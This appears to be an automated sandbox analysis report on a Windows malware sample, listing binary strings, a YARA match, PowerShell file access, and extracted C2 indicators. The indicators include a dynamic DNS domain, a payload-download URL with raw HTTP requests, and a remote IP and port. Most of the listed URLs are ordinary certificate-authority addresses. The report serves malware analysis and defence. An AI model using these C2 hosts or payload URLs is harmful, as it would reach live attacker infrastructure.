                        Source: Binary string: cryptbase.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.390086007.0000000002B72000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.372135848.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: comctl32v582.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.373985159.0000000002E68000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: cfgmgr32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.396746922.0000000002BAC000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: oleaut32.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.372403059.0000000002E60000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: bcryptprimitives.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.373786865.0000000002B72000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: Windows.Storage.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.376967182.000000000341B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: combase.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.372628723.0000000003414000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: ApplicationFrameWindowWindows.Foundation.Collections.IIterator`1<IUnknown>Windows.Foundation.Collections.IVectorView`1<IUnknown>Windows.Foundation.Collections.IVector`1<IUnknown>@%SystemRoot%\System32\SettingSyncCore.dll,-1024internal\onecoreuapshell\private\inc\shouldswitchtodesktop.hinternal\onecoreuapshell\private\inc\sharedstoragesources\syncrootcommon.hData\Program Files\Data\Program Files (x86)\Data\ProgramData\Data\Windows\Program Files\Program Files (x86)\ProgramData\Windows\$Windows.~BT\Windows.old\.appx.appxbundle.appxpackage.automaticdestinations-ms.cat.cdxml.cer.cookie.customdestinations-ms.dmp.dsft.efi.etl.fon.ini.iso.mp.mpb.msip.msm.mui.nst.ocx.olb.ost.otf.p10.p12.p7b.p7c.p7m.p7r.p7s.p7x.partial.pdb.pem.pfm.pfx.psd1.psf.rll.sft.spc.spkg.sst.ttc.ttf.vmcx.vmrs.vsi.vsix.wfs.wim.winmd.xapFTSearched0000000000000000000BasicPropertiesDocumentPropertiesImagePropertiesVideoPropertiesMusicPropertiesRenameAsyncOverloadDefaultOptionsRenameAsyncIStorageItem2GetParentAsyncIsEqualGetThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetThumbnailAsyncOverloadDefaultOptionsget_DisplayNameIStorageItemProperties2GetScaledImageAsThumbnailAsyncOverloadDefaultSizeDefaultOptionsGetScaledImageAsThumbnailAsyncOverloadDefaultOptionsGetScaledImageAsThumbnailAsyncIStorageItemPropertiesWithProviderget_ProviderIStorageItemThumbnailAccessPrivGetScaledImageOrThumbnailAsyncIStorageItemHandleAcccessOpenAsyncPrivatePauseDeferredUpdateSetStreamedFileCallbackGetStreamedFileCallbackGetSpecialInternalPropertySetSpecialInternalPropertyCreateTempFileInSameLocationCopyOverloadDefaultOptionsCopyOverloadCopyAndReplaceAsyncMoveOverloadDefaultNameAndOptionsWindows.Security.EnterpriseData.FileProtectionManagerMoveOverloadDefaultOptionsoptionsCreateFolderAsyncOverloadDefaultOptionsGetItemAsyncGetItemsAsyncOverloadDefaultStartAndCountCreateFileQueryOverloadDefaultCreateFileQueryCreateFolderQueryOverloadDefaultCreateFolderQueryCreateFolderQueryWithOptionsCreateItemQueryWithOptionsGetFilesAsyncOverloadDefaultStartAndCountGetFoldersAsyncOverloadDefaultStartAndCountget_MusicLibraryget_HomeGroupget_RemovableDevicesget_MediaServerDevicesget_Playlistsget_SavedPicturesget_Objects3Dget_AppCapturesget_RecordedCallsGetFolderForUserAsyncget_ApplicationDataSharedLocalGetPublisherCacheFolderGetApplicationDataFolderForUserGetPublisherCacheFolderForUserknownfolder:{AB5FB87B-7CE2-4F83-915D-550846C9537B}knownfolder:{B4BFCC3A-DB2C-424C-B029-7FE99A87C641}knownfolder:{1C2AC1DC-4358-4B6C-9733-AF21156576F0}knownfolder:{FDD39AD0-238F-46AF-ADB4-6C85480369C7}knownfolder:{374DE290-123F-4565-9164-39C4925E467B}knownfolder:{bfb9d5e0-c6a9-404c-b2b2-ae6db6af4968}knownfolder:{4BD8D571-6D19-48D3-BE97-422220080E43}knownfolder:{33E28130-4E1E-4676-835A-98395C3BC3BB}knownfolder:{AE50C081-EBD2-438A-8655-8A092E34987A}knownfolder:{C870044B-F49E-4126-A9C3-B52A1FF411E8}knownfolder:{3B193882-D3AD-4eab-965A-69829D1FB59F}knownfolder:{f3ce0f7c-4901-4acc-8648-d5d44b04ef8f}knownfolder:{18989B1D-99B5-455B-841C-AB7C74E4DDFC}get_Langua
                        Source: Binary string: CLBCatQ.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.386369418.0000000002E6E000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: oleaut32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.372403059.0000000002E60000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: apphelp.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.370004681.00000000029B4000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wuser32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.370202146.0000000002E65000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: comctl32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.382826553.0000000003418000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: iertutil.pdbUGP source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: crypt32.pdb source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmp

                        Spreading

                        barindex
                        Yara detected FloodFix
                        Source: Yara matchFile source: 0.2.0vJrK0NCd1.exe.10000000.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 0.2.0vJrK0NCd1.exe.2899224.1.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: C:\Program Files\Common Files\system\symsrv.dll, type: DROPPED
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\userJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\MicrosoftJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppDataJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\desktop.iniJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\RoamingJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Users\user\AppData\Roaming\Microsoft\WindowsJump to behavior

                        Networking

                        barindex
                        Uses ping.exe to check the status of other devices and networks
                        Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 6
                        C2 URLs / IPs found in malware configuration
                        Source: Malware configuration extractorURLs: lart.ydns.eu
                        Source: Malware configuration extractorURLs: https://balkancelikdovme.com/work/Elpuxpkilck
                        Source: Joe Sandbox ViewJA3 fingerprint: ce5f3254611a8c095a3d821d44539877
                        Source: global trafficHTTP traffic detected: GET /work/Elpuxpkilck HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
                        Source: global trafficHTTP traffic detected: GET /work/Elpuxpkilck HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
                        Source: global trafficHTTP traffic detected: GET /work/Elpuxpkilck HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)Host: balkancelikdovme.com
                        Source: global trafficTCP traffic: 192.168.2.3:49729 -> 185.216.71.113:1984
                        Source: 0vJrK0NCd1.exe, 00000000.00000002.463458772.000000000019B000.00000004.00000010.00020000.00000000.sdmpString found in binary or memory: http://://t.exet.exe
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/cps.html0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ac.economia.gob.mx/last.crl0G
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acedicom.edicomgroup.com/doc0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/DPCacraiz.pdf0?
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv1.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://acraiz.icpbrasil.gov.br/LCRacraizv2.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://appmap.trafficmanager.net/api/v1/parse?url=
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.disig.sk/ca/crl/ca_disig.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/DPCyPoliticas0g
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/crl/MTINAutoridadRaiz03
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca.mtin.es/mtin/ocsp0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ca2.mtin.es/mtin/crl/MTINAutoridadRaiz0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certificates.starfieldtech.com/repository/1604
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oati.net/repository/OATICA2.crt0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crl
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://certs.oaticerts.com/repository/OATICA2.crt08
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersignroot.html0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.chambersign.org/cps/chambersroot.html0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://cps.siths.se/sithsrootcav1.html0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.certigna.fr/certignarootca.crl01
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersignroot.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.chambersign.org/chambersroot.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.defence.gov.au/pki0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.dhimyotis.com/certignarootca.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000002.463584485.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.oces.trust2408.com/oces.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pki.wellsfargo.com/wsprca.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/SGCA.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.securetrust.com/STCA.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-a/cacrl.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-b/cacrl.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ssc.lt/root-c/cacrl.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.xrampsecurity.com/XGCA.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl1.comsign.co.il/crl/comsignglobalrootca.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/enRootDirUrl1.3.6.1.4.1.311.2.4.
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eca.hinet.net/repository/CRL2/CA.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://eca.hinet.net/repository/Certs/IssuedToThisCA.p7b05
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/cacert/ComSignAdvancedSecurityCA.crt0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignAdvancedSecurityCA.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignCA.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/ComSignSecuredCA.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://fedir.comsign.co.il/crl/comsignglobalrootca.crl0;
                        Source: 0vJrK0NCd1.exe, 00000000.00000002.475558058.000000007EC80000.00000004.00001000.00020000.00000000.sdmp, 0vJrK0NCd1.exe, 00000000.00000002.471795080.0000000010059000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: http://geoplugin.net/json.gp/C
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hao.360.cn/?src=lm&ls=n55dfe5b796http://hao.qq.com/?unc=Af31022NetGetAadJoinInformationnetapi
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://http.fpki.gov/fcpca/caCertsIssuedByfcpca.p7c0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.accv.es0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.eca.hinet.net/OCSP/ocspG2sha20
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.ncdc.gov.sa0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.pki.gva.es0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.suscerte.gob.ve0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.digidentity.eu/validatie0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://pki.registradores.org/normativa/index.htm0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://policy.camerfirma.com0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://postsignum.ttc.cz/crl/psrootqca2.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://repository.swisssign.com/0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://sertifikati.ca.posta.rs/crl/PostaCARoot.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.381746840.000000000341A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://test.com
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://trustcenter-crl.certificat2.com/Keynectis/KEYNECTIS_ROOT_CA.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcacomb1.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://web.ncdc.gov.sa/crl/nrcaparta1.crl
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org/doc0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.acabogacia.org0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1.crt0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/fileadmin/Archivos/certificados/raizaccv1_der.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es/legislacion_c.htm0U
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.accv.es00
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/acrn.crl0)
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.agesic.gub.uy/acrn/cps_acrn.pdf0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ancert.com/cps0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/AC/RC/ocsp0c
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.anf.es/es/address-direccion.html
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.379460711.0000000003419000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.baidu.com/favicon.icohttps://suggest.yandex.com.tr/suggest-ff.cgi?srv=ie11&uil=tr&part=
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ca.posta.rs/dokumentacija0h
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.cert.fnmt.es/dpcs/0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/pc-root2.pdf0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certeurope.fr/reference/root2.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certicamara.com/dpc/0Z
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class1.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class2.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3P.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.certplus.com/CRL/class3TS.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.chambersign.org1
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.comsign.co.il/cps0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.correo.com.uy/correocert/cps.pdf0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-bt0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-int0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.datev.de/zertifikat-policy-std0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.defence.gov.au/pki0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca/crl/ca_disig.crl0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.disig.sk/ca0f
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.dnie.es/dpc0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-me.lv/repository0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crl
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/RootCA.crt0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-szigno.hu/SZSZ/0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.e-trust.be/CPS/QNcerts
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ecee.gov.pt/dpc0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.echoworx.com/ca/root2/cps.pdf0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.eme.lv/repository0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.firmaprofesional.com/cps0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.globaltrust.info0=
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.ica.co.il/repository/cps/PersonalID_Practice_Statement.pdf0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.informatik.admin.ch/PKI/links/CPS_2_16_756_1_17_3_1_0.pdf0
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.oaticerts.com/repository.
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_1_0.pdf09
                        Source: 0vJrK0NCd1.exe, 00000000.00000003.383971593.0000000002E68000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.pki.admin.ch/cps/CPS_2_16_756_1_17_3_21_1.pdf0:
